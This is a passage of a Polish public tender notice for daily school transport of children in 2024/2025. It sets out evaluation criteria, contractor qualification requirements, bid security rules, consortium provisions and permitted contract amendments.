wartości Umowy określonej zgodnie z § 6 ust. 1 Projektu umowy stanowiącego załącznik nr 9b do SWZ. Podstawą określenia wartości usług zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe za 1 km zawarte w formularzu ofertowym stanowiącym część Oferty <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert wartość wagowa wyrażona w (%) zostanie wyrażona w punktach (1% = 1pkt.)<br/><br/>17.2	Oferty będą oceniane w odniesieniu do najkorzystniejszych danych przedstawionych przez Wykonawców odpowiednio w zakresie kryterium, w następujący sposób:<br/>1)	Kryterium I - Cena brutto (C) – waga 60% <br/>W ramach kryterium „Cena brutto” ocena ofert dokonana zgodnie z poniższym wzorem: <br/><br/>	C =	cena brutto oferty najtańszej x 60 pkt.<br/> cena brutto oferty ocenianej	<br/>gdzie:	C -	Wartość punktowa badanej oferty<br/> <br/><br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>Ocenie w ramach kryterium „cena brutto” podlegać będzie cena brutto podana w ofercie.<br/>2)	czas reakcji (D) – waga 40%<br/>Ocenie będzie podlegał czas w jakim Wykonawca zobowiązuje się do zapewnienia transportu zastępczego przez innego przewoźnika/własnego transportu zastępczego lub innego pojazdu zastępczego, do którego posiada tytuł prawny od zaistnienia sytuacji uniemożliwiającej zrealizowanie kursu. <br/><br/>W ramach kryterium „Czas reakcji” ocena zostanie dokonana zgodnie z poniższym wzorem:<br/><br/>	D =	Najkrótszy czas reakcji x 40 pkt.<br/> Czas reakcji oferty ocenianej	<br/><br/>gdzie: D – wartość punktowa badanej oferty<br/> <br/>Maksymalna ilość punktów do uzyskania w kryterium „Czas reakcji” to 40,00 pkt. <br/><br/>UWAGA: <br/>a)	„Czas reakcji” musi być określony w pełnych minutach.<br/>b)	Zamawiający ustala minimalny czas reakcji, który wynosi 30 minut.<br/>c)	Zamawiający ustala maksymalny czas reakcji, który wynosi 90 minut.<br/>d)	Czas reakcji krótszy niż 30 minut, dla potrzeb obliczania punktacji będzie traktowany jak 30 minut.<br/>e)	Czas reakcji dłuższy niż 90 minut, dla potrzeb obliczania punktacji będzie traktowany jak 90 minut. <br/>f)	W przypadku braku wskazania w ofercie czasu reakcji Wykonawca otrzyma 0 punktów w tym kryterium.<br/>g)	Czas reakcji liczony jest od momentu telefonicznego powiadomienia Wykonawcy.<br/>17.3 Ostateczną ocenę oferty stanowi suma punktów uzyskanych w kryteriach określonych w pkt. 17.2., obliczona wg wzoru:<br/><br/>O = C + D - ostateczna ocena danej oferty<br/>C - wartość punktowa uzyskana przez badaną ofertę za kryterium cena<br/>D - wartość punktowa uzyskana przez badaną ofertę za kryterium czas reakcji <br/>17.4 Za najkorzystniejszą w danej części uznana zostanie oferta z najwyższą ilością uzyskanych punktów w w/w kryteriach oceny ofert.<br/> Wykonawca może uzyskać maksymalnie 100 punktów.<br/><br/>17.5 Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyżej wadze, Zamawiający wybiera ofertę z najniższą ceną. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający wzywa do wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 8.1	W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym <br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku zdolności do występowania w obrocie gospodarczym. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>dla części I - Wykonawca winien wykazać, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2024 r., poz. 728 z późn. zm.); <br/><br/>dla części II - Wykonawca winien wykazać, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie przewozu osób, zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2024 r., poz. 728)<br/><br/>dla części III - Wykonawca winien wykazać, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie przewozu osób, <br/>zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2024 r., poz. 728)<br/><br/>3)	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do sytuacji ekonomicznej lub finansowej.<br/>4)	zdolności technicznej lub zawodowej.<br/>a)	Warunek ten z zakresie zdolności technicznej zostanie uznany za spełniony jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej:<br/>dla części I - 1 pojazdem posiadającym 8 miejsc siedzących + miejsce dla kierowcy,<br/>dla części II - 1 autokarem posiadającym min. 19 miejsc siedzących + miejsce dla kierowcy,<br/>dla części III - 1 autokarem posiadającymi min. 28 miejsc siedzących + miejsce dla kierowcy.<br/><br/>Miejsca siedzące to liczba miejsc na jaką zarejestrowany jest pojazd bez miejsc stojących.<br/>Pojazdy/Autokary nie mogą być starsze niż wyprodukowane:<br/>- dla części I w 2010 roku.<br/>- dla części II i III w 2005 roku<br/><br/>b)	Warunek ten, w zakresie doświadczenia zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował lub realizuje (przy czym w tym przypadku będzie liczona wartość zrealizowanej części przedmiotu umowy), co najmniej:<br/>dla części nr I - 1 usługę polegającą na dowozie uczniów do placówek oświatowych o wartości nie mniejszej niż 50 000,00 zł brutto trwającą nieprzerwanie przez okres co najmniej 3 miesięcy,<br/>dla części nr II - 1 usługę polegającą na dowozie uczniów do placówek oświatowych o wartości nie mniejszej niż 80 000,00 zł brutto trwającą nieprzerwanie przez okres co najmniej 3 miesięcy,<br/>dla części nr III - 1 usługę polegającą na dowozie uczniów do placówek oświatowych o wartości nie mniejszej niż 20 000,00 zł brutto oraz wykaże, że usługa ta została wykonana należycie trwającą nieprzerwanie przez okres co najmniej 3 miesięcy,<br/>UWAGA: <br/>Jeżeli Wykonawca ubiega się o udzielenie zamówienia na kilka części może celem wykazania spełnienia warunków udziału w postępowaniu wykazać się w więcej niż jednej części tym samym doświadczeniem<br/>c)	Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej:<br/>dla części I - 1 osobą posiadającą prawo jazdy kat. B (do przewozu 8 osób) zgodnie z ustawą z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz. U. z 2023 r., poz. 622 z późn. zm.)<br/>dla części II - 1 osobą posiadającą prawo jazdy kat. D zgodnie z ustawą z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz. U. z 2023 r., poz. 622 z późn. zm.)<br/>dla części III - 1 osobą posiadającą prawo jazdy kat. D zgodnie z ustawą z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz. U. z 2023 r., poz. 622 z późn. zm.)<br/>Zamawiający wymaga, aby każda z osób uczestnicząca w wykonaniu zamówienia posiadała min. 2 letnie doświadczenie w zakresie przewozu osób. Doświadczenie oznacza czas liczony od dnia uzyskania uprawnień. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">10.3	W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 7.1 i 7.3 Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych odrębnie dla każdej części:<br/>a)	informacji z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP,(b) art. 108 ust. 1 pkt 4 PZP, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego, (c) art. 109 ust. 1 pkt 2 lit a) PZP, (d) art. 109 ust. 1 pkt 2 lit b) PZP, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu, (e) art. 109 ust. 1 pkt 3 PZP, dotyczącej skazania za przestępstwo lub ukarania za wykroczenie, za które wymierzona karę aresztu - sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem.<br/>b)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej samej grupy kapitałowej stanowi załącznik nr 5 do SWZ),<br/>c)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>d)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania - (wzór oświadczenie Wykonawcy stanowi załącznik nr 8 do SWZ).<br/>Dalsza część postanowień w tym postanowienia dot. dokumentów składanych przez Wykonawcę mającego siedzibę lub miejsce<br/>zamieszkania poza terytorium Rzeczypospolitej Polskiej zawarte są w pkt. 10.5 -10.7 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">10.2	W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 8.1. Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych odrębnie dla każdej części:<br/>1.	zezwolenia lub licencji na wykonywanie zawodu przewoźnika drogowego osób<br/>2.	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 6 do SWZ;<br/>3.	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat (wstecz od dnia w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane (wykaz usług stanowi załącznik nr 7 do SWZ);<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami (konsorcjum) wykaz, o którym mowa wyżej dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. Okres wyrażony w latach, o którym mowa wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert.<br/><br/>4.	dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>5.	wykazu pojazdów, dostępnych wykonawcy w celu wykonania zamówienia publicznego, wraz z informacjami o podstawie dysponowania tymi pojazdami, markę pojazdu, typ, datę produkcji, nr rejestracyjny oraz ilość miejsc siedzących na podstawie dowodu rejestracyjnego – załącznik nr 7a do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 14.1	Oferta musi być sporządzona pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Oferta musi być sporządzona w języku polskim, podpisana przez osobę upoważnioną.<br/>14.4	W terminie składania ofert określonym w pkt 15.1. SWZ wykonawca zobowiązany jest złożyć Zamawiającemu ofertę dla każdej części osobno zawierającą: <br/>a)	formularz Oferty (sporządzony wg wzoru stanowiącego załącznik nr 1 do SWZ) sporządzony pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>b)	oświadczenia, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci <br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu składającego oświadczenie, złożone przez:<br/>•	Wykonawcę,<br/>•	Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), <br/>c)	oświadczenia, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 3 do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu udostępniającego Wykonawcy zasoby na zasadzie określonej w art. 118 w zw. z art. 266 PZP, o ile dotyczy,<br/>d)	zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie z pkt 10.4. SWZ, jeżeli Wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów; (Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 4 do SWZ),<br/>e)	odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane umożliwiające dostęp do tych dokumentów, wypełniając informacje w formularzu oferty,<br/>f)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) lub osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP, jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP - działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 14.4. lit e) SWZ, sporządzone w sposób określony w pkt 10.13.-10.22 SWZ, <br/>g)	oświadczenie, o którym mowa w art. 117 ust. 4 PZP – z którego wynika, które usługi wykonają poszczególni Wykonawcy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum)<br/>h)	wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia (tylko, gdy Wykonawca wnosi wadium w formie niepieniężnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 12.1	Zamawiający wymaga wniesienia wadium w wysokości:<br/>•	Dla części I – 500,00 zł (słownie: pięćset złotych), <br/>•	Dla części II – 1 000,00 zł (słownie: jeden tysiąc złotych).<br/>•	Dla części III - 300,00 zł (słownie: trzysta złotych).<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP. <br/>12.2	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2024 r. poz. 419).<br/>12.3	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym w Poniecu, Oddział w Czempiniu numer 36 8682 1030 0040 0000 0390 0003 tytułem: FZ.271.1.28.2024 Codzienny dowóz i odwóz dzieci do placówek oświatowych w roku szkolnym 2024/2025 – cz…… <br/><br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>12.4	Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>12.5	Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 12.2. ppkt 2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>12.6	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga, aby w treści wadium wnoszonego w formach, o których mowa w pkt 12.2. ppkt 2)-4) SWZ zostali wymienieni wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia albo powinno z niej wynikać, że Wykonawca, na którego gwarancja/poręczenie zostały wystawione działa w imieniu innych Wykonawców wspólnie ubiegających się o udzielenie zamówienia, bądź w ich treści powinien zostać ujęty szerszy zakres odpowiedzialności gwaranta/poręczyciela niż tylko dotyczący działań/zaniechań odnoszących się do Wykonawcy, na którego gwarancja/poręczenie to zostało wystawione.<br/>12.7	Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia<br/>3)	kwotę gwarancji/poręczenia,<br/>4)	zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>12.8	Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.9	W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): <br/>1)	w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2)	oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3)	Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków udziału w postępowaniu oraz oświadczenie o braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 2 do SWZ) składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4)	dokumenty, o których mowa w pkt 10.3. obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>5)	wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>6)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7)	Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>8)	Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 PZP odnosi się również do Wykonawców, prowadzących działalność w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dla części I: <br/>Na podstawie art. 455 ust. 1 pkt. 1) ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych, Zamawiający dopuszcza:<br/>1)aktualizację poprzez zmianę harmonogramu w zakresie przebiegu tras dowozów, ilości kilometrów dziennie, ilości dzieci do przewożenia oraz godziny dowozu, uwzględniając aktualne potrzeby szkoły i opinie (zmiana nie wymaga podpisania aneksu i będzie dokonywana poprzez pisemne - dopuszcza się skan dokumentu przesłany e-mailowo - poinformowanie Wykonawcy),<br/>2)zmianę pojazdów, o których mowa w §3 ust. 1 na zasadach określonych w tym paragrafie (zmiana nie wymaga podpisania aneksu i będzie dokonywana poprzez pisemne - dopuszcza się skan dokumentu przesłany e-mailowo - poinformowanie Wykonawcy)(...) Dalsza część dotycząca zmian umowy zawarta jest w § 10 załącznika nr 9 do SWZ - Projekt umowy dla cz.I.<br/>Dla części II:<br/>Na podstawie art. 455 ust. 1 pkt. 1) ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych, Zamawiający dopuszcza:<br/>1)aktualizację poprzez zmianę harmonogramu w zakresie przebiegu tras dowozów, ilości kilometrów dziennie, ilości dzieci do przewożenia oraz godziny dowozu, uwzględniając aktualne potrzeby szkoły i opinie (zmiana nie wymaga podpisania aneksu i będzie dokonywana poprzez pisemne - dopuszcza się skan dokumentu przesłany e-mailowo - poinformowanie Wykonawcy),<br/>2)zmianę pojazdów, o których mowa w §3 ust. 1 na zasadach określonych w tym paragrafie (zmiana nie wymaga podpisania aneksu i będzie dokonywana poprzez pisemne - dopuszcza się skan dokumentu przesłany e-mailowo - poinformowanie Wykonawcy)(...) Dalsza część dotycząca zmian umowy zawarta jest w § 10 załącznika nr 9a do SWZ - Projekt umowy dla cz.II.<br/>Dla części III:<br/>Na podstawie art. 455 ust. 1 pkt. 1) ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych, Zamawiający dopuszcza:<br/>1)aktualizację poprzez zmianę harmonogramu w zakresie przebiegu tras dowozów, ilości kilometrów dziennie, ilości dzieci do przewożenia oraz godziny dowozu, uwzględniając aktualne potrzeby szkoły i opinie (zmiana nie wymaga podpisania aneksu i będzie dokonywana poprzez pisemne - dopuszcza się skan dokumentu przesłany e-mailowo - poinformowanie 